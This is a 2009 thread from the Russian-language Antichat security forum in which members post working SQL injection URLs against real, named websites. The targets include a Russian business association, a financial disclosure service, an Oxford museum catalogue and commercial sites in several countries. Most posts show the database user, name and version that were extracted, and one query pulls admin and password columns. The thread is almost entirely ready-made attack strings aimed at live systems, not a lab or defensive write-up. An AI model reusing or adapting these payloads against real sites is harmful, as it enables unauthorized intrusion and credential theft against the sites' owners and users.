ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10991  
Старый 20.10.2009, 19:37
sos17
Новичок
Регистрация: 17.10.2009
Сообщений: 3
Провел на форуме:
17441

Репутация: 5
По умолчанию

http://www.exposicaodeartesanato.com.br/detalhe_produto.php?id_produto=-1+union+all+select+1,2,3,4,5,6,7,8,concat_ws(char( 58,58),user(),database(),version()),10,11,12,13,14 ,15,16,17,18,19--

expos_sirius@localhost::expos_exposicao::4.1.22-standard
 
Ответить с цитированием

  #10992  
Старый 20.10.2009, 20:13
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию

Российский союз промышленников и предпринимателей.
тИЦ: 1400
PR: 6


Цитата:
http://www.rspp.ru/Default.aspx?CatalogId=283&Year=2009+union+all+sel ect+null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,@@version,28+fro m+information_schema.tables--&Month=10&Day=15
Код:
Microsoft SQL Server  2000 - 8.00.2055 (Intel X86) 
Dec 16 2008 19:46:53 
Copyright (c) 1988-2003 Microsoft Corporation
Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

Федеральное государственное учреждение «Научно исследовательский институт — Республиканский исследовательский научно-консультационный центр экспертизы»
тИЦ: 1700
PR: 5


Цитата:
http://www.extech.ru/library/spravo/vak/tolko_vak/f1.php?kod1=-1+union+select+concat_ws(0x3a,database(),user(),ve rsion()),2,3,4,5
Код:
VAK:php@localhost:5.0.32-Debian_7etch11-log
 
Ответить с цитированием

  #10993  
Старый 20.10.2009, 20:31
min7
Участник форума
Регистрация: 03.09.2005
Сообщений: 123
Провел на форуме:
1896022

Репутация: 259
По умолчанию

Код:
http://www.redorange.de/public/php/showreel_detail.php?id=116+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
Database Version: 5.0.32-Debian_7etch5-log
Database name: usr_web190_1
User name: web190@localhost
 
Ответить с цитированием

  #10994  
Старый 20.10.2009, 20:58
[underwater]
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме:
2185909

Репутация: 308
По умолчанию

Код:
http://www.podlupom.com/index.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
Версия:
Код:
http://www.podlupom.com/index.php?id=-1 UNION ALL SELECT 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19--
Таблицы:
Код:
http://www.podlupom.com/index.php?id=-1 UNION ALL SELECT 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.tables--
Колонки:
Код:
http://www.podlupom.com/index.php?id=-1 UNION ALL SELECT 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.columns--
Код:
http://www.podlupom.com/index.php?id=-1UNION ALL SELECT 1,2,3,4,schema_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.schemata--
 
Ответить с цитированием

  #10995  
Старый 20.10.2009, 23:08
edge911
Участник форума
Регистрация: 21.02.2009
Сообщений: 228
Провел на форуме:
2175726

Репутация: 368
По умолчанию

Microsoft JET Database Engine:

Цитата:
http://www.packet.com.cn/product_view.asp?id=283+union+select+1,2,3,admin,p assword,6,7,8,9,10,11,12,13,14,15+from+admin
 
Ответить с цитированием

  #10996  
Старый 20.10.2009, 23:37
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию

Система комплексного раскрытия информации
тИЦ: 2700
PR: 6

Цитата:
http://www.skrin.ru/news/default.asp?id=9DC3ABAF4E4C49DF99A6913572D9A323'+O R+1=(select+@@version)--
Код:
Microsoft SQL Server 2005 - 9.00.3077.00 (X64) Dec 17 2008 20:40:08 Copyright (c) 1988-2005 
Microsoft Corporation Standard Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)
 
Ответить с цитированием

  #10997  
Старый 21.10.2009, 01:57
E-AL
Познающий
Регистрация: 03.10.2007
Сообщений: 37
Провел на форуме:
259133

Репутация: 68
По умолчанию

Код:
http://glinka-capella.ru/news/?id=-1+union+select+1,2,3,concat_ws(0x3a,concat_ws(0x3a,user(),version()),database()),5,6+--+
ТИЦ: 230
PR: 4

User: h_glinka_capella@localhost
Version: 5.0.70-debug-log
Name: glinka_capella_ru
 
Ответить с цитированием

  #10998  
Старый 21.10.2009, 06:58
VITАL
Познающий
Регистрация: 19.08.2008
Сообщений: 33
Провел на форуме:
140077

Репутация: 93
По умолчанию

mhs.ox.ac.uk pr7, v5
Цитата:
http://www.mhs.ox.ac.uk/gatt/catalog.php?num=33+and+2=1+union+select+version(), 2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%23
 
Ответить с цитированием

  #10999  
Старый 21.10.2009, 07:19
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
http://www.planetperplex.com/en/img.php?id=-35+UNION+SELECT+1,2,3,4,5,AES_DECRYPT(AES_ENCRYPT( CONCAT_WS(0x3a,Version(),Database(),User()),0x71), 0x71),7--
User: p5547pla_admin@localhost
Database: p5547pla_planetperplex
Version:81-community
 
Ответить с цитированием

  #11000  
Старый 21.10.2009, 09:10
s0l_ir0n
Участник форума
Регистрация: 14.03.2009
Сообщений: 237
Провел на форуме:
813785

Репутация: 314
Отправить сообщение для s0l_ir0n с помощью ICQ
По умолчанию

Сайт какой-то фирмы:
Цитата:
http://www.swisslinx.com/index2.php?h=63&key=-1%20union%20select%201,2,3,ConCat_ws%280x3a,user%2 8%29,database%28%29,version%28%29%29,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23%20--
Риэлторы в Севастополе:
Цитата:
http://www.sevhouse.com/photo.php?h=56%20union%20select%20ConCat_ws%280x3a ,user%28%29,database%28%29,version%28%29%29,2,3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20--
Агрокультуры резюме(с прикольным фильтром):
Цитата:
http://careersolutionsco.com/jobs/jobdetails.php?j=105%20union%20select%201,2,3,4,5, aes_decrypt%28aes_encrypt%28ConCat_ws%280x3a,user% 28%29,database%28%29,version%28%29%29,0x22%29,0x22 %29,7,8,9%20--
Французики:
Цитата:
http://www.oqe.ch/index.php?l=FR&rub=1&cat=3&page=-1%20%20union%20select%201,2,3,ConCat_ws%280x3a,use r%28%29,database%28%29,version%28%29%29,5,6,7,8,9% 20--
Metropolitan Market
Цитата:
http://metropolitan-market.com/locations.php?l=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,ConCat_ws%280x3a,user%28%29,database% 28%29,version%28%29%29,19,20%20--
Книжный магазин:
Цитата:
http://www.krkediciones.com/fichaLibro.php?l=-1%20union%20select%201,2,3,4,5,6,7,ConCat_ws%280x3 a,user%28%29,database%28%29,version%28%29%29,9,10, 11,12,13%20--
Немцы:
Цитата:
http://213.133.108.158/surveys/index.php?m=msg,1&gID=-1%20union%20select%201,aes_decrypt%28aes_encrypt%2 8ConCat_ws%280x3a,user%28%29,database%28%29,versio n%28%29%29,0x41%29,0x41%29,3%20--
Хомяк какого-то чела:
Цитата:
http://www.matt-clark.co.uk/spe.php?o=-1%20union%20select%201,ConCat_ws%280x3a,user%28%29 ,database%28%29,version%28%29%29,3,4%20--
Японцы:
Цитата:
http://www.muryoj.com/get.php?R=-1%20union%20select%201,2,3,aes_decrypt%28aes_encry pt%28ConCat_ws%280x3a,user%28%29,database%28%29,ve rsion%28%29%29,0x41%29,0x41%29,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22%20--
Такой же японский двиг:
Цитата:
http://mailzou.com/get.php?R=-1%20union%20select%201,2,3,aes_decrypt%28aes_encry pt%28ConCat_ws%280x3a,user%28%29,database%28%29,ve rsion%28%29%29,0x41%29,0x41%29,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21%20--
То же самое без фильтра:
Цитата:
http://xam.jp/get.php?R=-1%20union%20select%201,2,ConCat_ws%280x3a,user%28% 29,database%28%29,version%28%29%29,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31%20--
Танц клуб:
Цитата:
http://www.sustainabledanceclub.com/index.php?t=newsd&n=-1%20union%20select%201,2,3,4,ConCat_ws%280x3a,user %28%29,database%28%29,version%28%29%29%20--

Последний раз редактировалось s0l_ir0n; 21.10.2009 в 14:47..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT.XYZ